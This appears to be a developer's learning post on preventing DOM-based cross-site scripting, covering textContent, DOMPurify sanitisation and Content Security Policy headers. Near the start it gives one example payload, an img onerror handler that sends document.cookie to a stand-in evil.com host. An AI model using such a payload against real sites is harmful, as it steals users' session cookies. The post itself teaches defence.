XSS (Cross-Site Scripting)
Cross-Site Scripting (XSS) happens when an attacker injects malicious code into a web page, and the browser executes it as if it were part of the original site.
The most common DOM-based XSS vector is innerHTML. When I use innerHTML to insert a string, the browser parses that string as HTML — creating real elements, including elements that can execute JavaScript.
// A user types this into a form field:
const userInput = '<img src="x" onerror="document.location='https://evil.com/steal?'+document.cookie">';
// Your code puts it on the page with innerHTML:
element.innerHTML = userInput;
// → Browser creates a real <img> element
// → Image fails to load → onerror fires
// → Attacker's script runs with full page access
// → User's cookies are sent to the attacker's server The attacker didn't need access to the server. They exploited the fact that innerHTML parses strings as HTML.
The Safe Code Path
The safest pattern for putting user-provided content into the DOM avoids HTML parsing entirely:
// Create the element programmatically
const paragraph = document.createElement('p');
// Set its text with textContent (no parsing!)
paragraph.textContent = userInput;
// Add it to the page
container.appendChild(paragraph);
// Even if userInput contains <script> tags or onerror handlers,
// they display as literal text — never executed No HTML string is ever parsed. No injection is possible. This is the safest path.
The Safety Hierarchy
createElement + textContent (Safest)
Build elements programmatically and set text with textContent. No HTML parsing happens at all. This is the default choice for any user-provided content.
createElement + appendChild (Programmatic, Safe)
Build complex DOM structures entirely with createElement, setAttribute, and appendChild. More verbose, but no parsing means no injection.
innerHTML + DOMPurify (Library Sanitization)
When you need to render rich HTML (like formatted text from a CMS), sanitize it first with a library like DOMPurify. It strips dangerous elements and attributes before they reach the DOM.
CSP Headers (Server-Side Safety Net)
Content Security Policy headers tell the browser which scripts are allowed to run. Even if an XSS vulnerability exists in the code, CSP can prevent the injected script from executing.
Sanitization Libraries
Sometimes I need to insert HTML — for example, rendering formatted content from a database. In those cases, I sanitize the HTML before inserting it.
import DOMPurify from 'dompurify';
// Sanitize before inserting
const cleanHTML = DOMPurify.sanitize(untrustedHTML);
element.innerHTML = cleanHTML;
// DOMPurify strips:
// - <script> tags
// - onerror, onclick, and other event handlers
// - javascript: URLs
// - Other dangerous patterns DOMPurify is the most widely used DOM sanitization library. Always use version 3.2.4 or higher.
🟠 Important:
Sanitization is a fallback, not a first choice. If I can use textContent instead of innerHTML, I do. Sanitization libraries are for the cases where I genuinely need HTML rendering.
CSP Headers
Content Security Policy (CSP) is a server-side defense. It tells the browser which sources are allowed for scripts, styles, images, and other resources.
[[headers]]
for = "/*"
[headers.values]
Content-Security-Policy = "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'; img-src 'self' https://res.cloudinary.com" This policy only allows scripts from the same origin. Injected inline scripts would be blocked by the browser.
CSP can also be set via a <meta> tag in the HTML head, or through edge functions that add headers dynamically.
Defense in Depth
Security works best in layers. No single defense is perfect, so I learned to combine them:
Level 1: Code Decisions
Use textContent instead of innerHTML. Build elements with createElement. Sanitize with DOMPurify when HTML rendering is required. These are decisions I make every time I write code.
Level 2: Server Configuration
Set CSP headers to restrict what the browser will execute. Even if a vulnerability slips through my code, CSP can block the attack from succeeding.
🟠 My Takeaway:
I don't rely on any single defense. I write safe code and configure server protections. If one layer fails, the other is still there.
Looking Ahead
In Testing Lab Week 3, I'll add automated security tools to my workflow: ESLint rules that flag dangerous DOM methods, npm audit to check for vulnerable dependencies, and Dependabot to keep packages updated automatically.
Security isn't a one-time decision — it's a habit that gets reinforced with the right tools. 🟠